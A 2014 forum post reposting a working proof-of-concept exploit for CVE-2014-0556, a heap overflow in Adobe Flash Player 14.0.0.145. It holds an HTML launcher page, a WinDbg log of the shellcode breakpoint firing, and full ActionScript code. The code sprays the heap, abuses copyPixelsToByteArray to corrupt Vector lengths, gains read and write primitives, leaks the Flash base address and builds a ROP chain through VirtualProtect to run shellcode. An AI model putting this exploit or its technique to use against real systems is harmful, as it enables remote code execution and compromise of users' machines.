sniffer Posted October 1, 2014 Report Posted October 1, 2014 CVE-2014-0556 : Heap-based buffer overflow in Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OSAdobe Flash 14.0.0.145 copyPixelsToByteArray() Heap Overflow ? Packet Storm/*<html><head> <title>CVE-2014-0556</title> </head><body><object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br><button onclick="swf.exploit()">STOP</button></body></html>*//*(1728.eb0): Break instruction exception - code 80000003 (first chance)eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984eip=08d63048 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=0020020208d63048 cc int 31:020> dd esp l408d63048 cccccccc cccccccc cccccccc cccccccc1:020> teax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984eip=08d63049 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=0020020208d63049 cc int 31:020> teax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984eip=08d6304a esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=0020020208d6304a cc int 31:020> teax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984eip=08d6304b esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=0020020208d6304b cc int 31:020> teax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984eip=08d6304c esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=0020020208d6304c cc int 3*/package { import flash.events.* import flash.media.* import flash.display.* import flash.geom.* import flash.utils.* import flash.text.* import flash.external.ExternalInterface public class Main extends Sprite { private var i0:uint private var i1:uint private var i2:uint private var i3:uint private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & Flash 14.0.0.145") private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200) private var ob:Vector.<Object> = new Vector.<Object>(6400) private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff) private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4) private var snd:Sound private var vector:uint private var vtable:uint private var flash:uint public function Main():void { for (i0 = 0; i0 < 3200; i0++) { ba[i0] = new ByteArray() ba[i0].length = 0x2000 ba[i0].position = 0xfffff000 } for (i0 = 0; i0 < 3200; i0++) { if (i0 % 2 == 0) ba[i0] = null ob[i0 * 2] = new Vector.<uint>(1008) ob[i0 * 2 + 1] = new Vector.<uint>(1008) } bitmap.copyPixelsToByteArray(rect, ba[1601]) for (i0 = 0;; i0++) if (ob[i0].length != 1008) break ob[i0][1024 * 3 - 2] = 0xffffffff for (i1 = 0;; i1++) { if (i0 == i1) continue if (ob[i1].length != 1008) break } ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1] ob[i0].fixed = true for (i2 = 1000;; i2++) { if (ob[i1][0xFFFFFFFF - i2 + 0] == 0 && ob[i1][0xFFFFFFFF - i2 + 10] == 1 && ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15]) { vector = ob[i1][0xFFFFFFFF - i2 + 11] break } else if (ob[i1][i2 + 0] == 0 && ob[i1][i2 + 10] == 1 && ob[i1][i2 + 5] == ob[i1][i2 + 15]) { vector = ob[i1][i2 + 11] break } } snd = new Sound() for (i2 = 0; i2 < 6400; i2++) { if (i2 == i0 || i2 == i1) continue ob[i2] = null ob[i2] = new Vector.<Object>(1014) ob[i2][0] = snd ob[i2][1] = snd } for (i2 = 0;; i2++) { if (ob[i0][i2 + 0] == 1014 && ob[i0][i2 + 1] == ob[i0][i2 + 2] && ob[i0][i2 + 3] == 1 ) { vtable = read(ob[i0][i2 + 1] - 1) flash = vtable - 0x00c3c1e8 // Flash32_14_0_0_145.ocx write(ob[i0][i2 + 1] - 1, vector + 0xf54) for (i3 = 0; i3 < 1008; i3++) { ob[i0][i3] = 0x41414100 | i3 } ob[i0][0] = flash + 0x004d6c50 // POP EBP # RETN ob[i0][1] = flash + 0x004d6c50 // skip 4 bytes ob[i0][2] = flash + 0x00a21b36 // POP EBX # RETN ob[i0][3] = 0x00000201 // 0x00000201 ob[i0][4] = flash + 0x008ec368 // POP EDX # RETN ob[i0][5] = 0x00000040 // 0x00000040 ob[i0][6] = flash + 0x00691119 // POP ECX # RETN ob[i0][7] = vector + 2000 // Writable location ob[i0][8] = flash + 0x005986d2 // POP EDI # RETN ob[i0][9] = flash + 0x00061984 // RETN (ROP NOP) ob[i0][10] = flash + 0x001bf342 // POP ESI # RETN ob[i0][11] = flash + 0x0000d83f // JMP [EAX] ob[i0][12] = flash + 0x000222b5 // POP EAX # RETN ob[i0][13] = flash + 0x00b8a3a8 // ptr to VirtualProtect() ob[i0][14] = flash + 0x00785916 // PUSHAD # RETN ob[i0][15] = flash + 0x0017b966 // ptr to 'jmp esp' ob[i0][16] = 0xcccccccc // shellcode ob[i0][17] = 0xcccccccc // shellcode ob[i0][18] = 0xcccccccc // shellcode ob[i0][19] = 0xcccccccc // shellcode ob[i0][979] = flash + 0x0029913A // POP EAX # RETN ob[i0][980] = 0x00000f58 ob[i0][981] = flash + 0x00195558 // PUSH ESP # POP ESI # RETN ob[i0][982] = flash + 0x0036B3B2 // SUB ESI,EAX # POP ECX # MOV EAX,ESI # POP ESI # RETN ob[i0][985] = flash + 0x0095024c // XCHG EAX,ESP # RETN ob[i0][1007] = flash + 0x0095024c // XCHG EAX,ESP # RETN break } } ob[i1][0xFFFFFFFE - 1024 * 3] = 4096 ob[i0][1024 * 3 - 2] = 0 str += flash.toString(16) var tf:TextField = new TextField(); tf.width = 800; tf.height = 800; tf.text = str; addChild(tf) if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit) } private function write(addr:uint, data:uint):void { ob[i0][(addr - vector) / 4 - 2] = data } private function read(addr:uint):uint { return ob[i0][(addr - vector) / 4 - 2] } private function zeroPad(number:String, width:int):String { if (number.length < width) return "0" + zeroPad(number, width-1) return number } public function exploit():void { snd.toString() } }} 1 Quote